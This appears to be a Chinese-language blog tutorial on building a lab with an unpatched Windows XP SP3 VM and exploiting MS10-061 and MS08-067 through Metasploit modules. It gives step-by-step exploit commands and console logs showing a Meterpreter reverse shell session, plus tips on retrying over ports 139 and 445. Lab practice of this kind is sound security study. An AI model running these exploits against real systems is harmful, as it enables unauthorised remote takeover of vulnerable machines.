MS10-061靶机搭建环境网上并没找到什么资料,做一个总结,为大家提供参考:
MS10-061:打印后台程序服务中可能允许远程执行代码漏洞
准备环境:
VMware
WINDOWS XP SP3 原版镜像,不能打过补丁
下载地址:
http://pan.baidu.com/s/1kT7veCZ
1、安装完成后,在控制面板中的---打印机和传真---下有默认的Microsoft打印机,但好像并不好用(可以尝试下直接改属性---端口为COM1试试)。
2、VMware提供虚拟打印机,在com1口。
3、删掉了默认的打印机(自愿),然后,添加打印机---连接到次计算机的本地打印机(去掉勾选的自动检测)---COM1口(VMware中查看即可)---打印机厂商默认即可---打印机名---共享---位置随意可不填
4、重启print Spooler服务(不重启可能导致meta连接打印机失败)
5、保存一个快照(便于恢复环境和下面的漏洞的测试)
6、攻击PC启动metasploit---
7、use exploit/windows/smb/ms10_061_spoolss
8、set RHOST 目标ip
9、set PNAME 目标打印机name
10、exploit
此时就返回了一个
meterpreter >
MS08-067靶机环境同样没什么资料,也来个总结:
这个洞有两个端口可以利用,139和445,不废话,上步骤和实验数据:
1、上面那个环境就可以继续用,打开3个服务,Computer Browser、Server、WorkStation
2、设置一个文件夹共享,如右键 共享文档 --- 共享和安全---在网络上共享这个文件夹(共享名可以默认)---确定
3、保存快照2(这里用于方便后面的实验,由于这个洞比较有个性,所以建议保存下吧)
4、上metasploit
5、use exploit/windows/smb/ms08_067_netapi
6、set RHOST 目标ip
7、set RPORT 目标端口(445/139)
8、exploit
9、这里要说明一下这个洞为什么有个性:
本人实验发现:有时候会攻击失败,有时候又攻击成功,有时候139可以用,有时候445可以用。。。风云变幻莫测,一切规律。。看心情,但经过N2次实验总结,最终得出如下结论:
1)(猜测)这个攻击可能由于每次溢出攻击时堆栈环境不同而覆盖的返回地址有时候并不能得到预期的返回地址导致攻击失败,此时的场景多见于445端口:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 200.200.88.179:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:Chinese - Traditional
[*] Selected Target: Windows XP SP3 Chinese - Traditional (NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) >
此时查看靶机:共享文档的共享属性没了,服务computer browser关闭了,如果等一会,桌面还会出现少许的异常变化。此时恢复快照吧
2)场景2:执行139的成功率是大于445的。尤其是对于新配置好的环境,最好先选择执行139,但第一次执行,可能出现如下问题:
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 200.200.88.179:4444
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB server did not reply to our request
解决方案:
多试几次,总会回答
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 200.200.88.179:4444
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB server did not reply to our request
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 200.200.88.179:4444
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The SMB server did not reply to our request
[*] Sending stage (885806 bytes) to 200.200.88.182
[*] Meterpreter session 1 opened (200.200.88.179:4444 -> 200.200.88.182:2380) at 2015-08-15 16:27:38 +0800
meterpreter >
总结:一般的,139的溢出攻击可能会更稳定一些,不会存在破坏靶机环境的问题,而445只要失败了,基本靶机服务就挂了,重启服务也可以,但不如恢复快照好。恢复后,建议先选择139端口进行攻击,多尝试几次就成功了,成功后,再尝试445,不行再恢复快照。偶尔人品好的时候,可以139、445各种轮流溢出,不好的时候,去洗洗脸吧。。